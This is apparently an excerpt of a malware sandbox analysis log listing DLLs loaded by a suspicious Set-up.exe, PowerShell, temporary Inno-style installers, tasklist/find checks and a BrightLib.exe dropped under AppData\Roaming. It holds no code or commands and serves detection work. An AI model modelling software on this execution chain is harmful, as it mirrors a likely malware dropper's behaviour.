              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
